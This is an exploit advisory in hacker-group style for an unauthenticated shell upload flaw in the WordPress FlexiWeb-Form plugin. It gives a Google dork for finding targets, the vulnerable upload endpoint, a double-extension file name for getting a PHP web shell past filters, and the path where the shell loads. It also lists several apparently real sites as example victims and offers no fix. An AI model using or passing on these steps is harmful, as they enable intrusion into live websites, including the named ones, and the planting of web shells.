The WordPress FlexiWeb-Form plugin suffers from a remote shell upload vulnerability.
f5788fd20d126e3bdb40fe524e1682956c5e0a164a7661495c6755a22acfd6e9
##################################################################
0101010101----010101010101010
01 01------0101 0101
01 01------0101 0101
01 01------0101 0101
01 01------0101 0101
01 01------0101 0101
01 01------0101 0101
01 01------0101010101
01 01------0101 010
01 01------0101 010
01 01------0101 010
01 01------0101 010
01 01------0101 010
0101010101----0101 010
##################################################################
[+] Exploit Title : Word press flexiweb-form plugin Remote File Uploader
[+] Google Dork : inurl:plugins/flexiweb-form/
[+] Autor : Mr.XpR
[+] Download : http://www.flexiweb.com.au
[+] Researcher Team : IRaNHaCK Security Team
[+] Bug Level : High (RFU)
[+] Test : 7 , Linux Back Track
##################################################################
[+]Exploit
[-] http://Site.il/wp-content/plugins/flexiweb-form/ajax/upload_img.php
[-] http://memorialpage.com/wp-content/plugins/flexiweb-form/ajax/upload_img.php
[+]Sh3ll
[-] Upload Shell PhP ==> Shell.PhP or Shell.PhP;.jpg
[+]Load Shell
[-] http://www.Site.il/patch/wp-content/plugins/flexiweb-form/images/Shell.php
[+]Example :
[-] http://michelle1.memorialpage.com/wp-content/plugins/flexiweb-form/ajax/upload_img.php
[-] http://memorialpage.com/wp-content/plugins/flexiweb-form/ajax/upload_img.php
[-] http://augustop.memorialpage.com/wp-content/plugins/flexiweb-form/ajax/upload_img.php
[-] http://augustoperella1.memorialpage.com/wp-content/plugins/flexiweb-form/ajax/upload_img.php
[-] More In Google ...
Persian Gulf For Ever - Tnx To all Persian Hackerz
Bax:
Siamak Black - UnknowN - farbod ezrael - hell boy - all iranian hackerz